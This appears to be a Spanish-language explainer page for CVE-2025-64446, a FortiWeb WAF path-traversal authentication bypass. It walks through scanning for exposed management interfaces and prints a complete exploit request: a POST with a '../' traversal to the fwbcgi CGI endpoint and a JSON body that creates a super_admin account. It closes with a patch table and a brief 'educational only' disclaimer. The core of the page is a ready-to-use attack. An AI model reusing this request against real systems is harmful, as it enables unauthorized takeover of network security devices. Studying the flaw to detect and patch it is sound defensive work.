
CVE-2025-64446

Vulnerabilidad crítica no autenticada que permite a atacantes remotos crear cuentas de administrador en dispositivos FortiWeb.
CVE-2025-64446 es una grave vulnerabilidad de salto de ruta relativa en la interfaz de gestión de FortiWeb Web Application Firewall.
Un atacante remoto no autenticado puede explotar esta falla para eludir la autenticación y crear nuevos usuarios administradores con todos los privilegios, lo que lleva a un compromiso total del dispositivo.
Recomendación: Actualice a la versión parcheada más reciente lo antes posible.
Identificación del Objetivo
El atacante escanea interfaces de gestión de FortiWeb expuestas públicamente (generalmente en el puerto HTTPS 443 o 8443).
Creación de la Solicitud Maliciosa
El núcleo del exploit es un salto de ruta relativa (../) combinado con una URL especialmente diseñada que alcanza un endpoint CGI interno no autenticado.
Patrón de Endpoint Vulnerable:
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
Envío del Exploit
El atacante envía una única solicitud POST con un payload JSON para crear una nueva cuenta de administrador.
Ejemplo de Solicitud de Exploit:
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiw eb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
Explotación Exitosa
Si tiene éxito, FortiWeb crea la nueva cuenta de administrador sin requerir autenticación previa. El atacante puede entonces iniciar sesión con las credenciales recién creadas y obtener el control total del WAF.
La API de gestión no sanean correctamente la ruta, lo que permite que la solicitud retroceda al binario heredado fwbcgi, que no aplica autenticación en ciertas operaciones.
fwbcgi, ../ o intentos inusuales de creación de administradoresSolo con fines educativos y de investigación defensiva de seguridad.
Hecho con ❤️ para la comunidad de ciberseguridad
Última actualización: Abril 2026
| Producto | Versiones Afectadas | Versión Corregida |
|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 y superiores |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 y superiores |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 y superiores |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 y superiores |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 y superiores |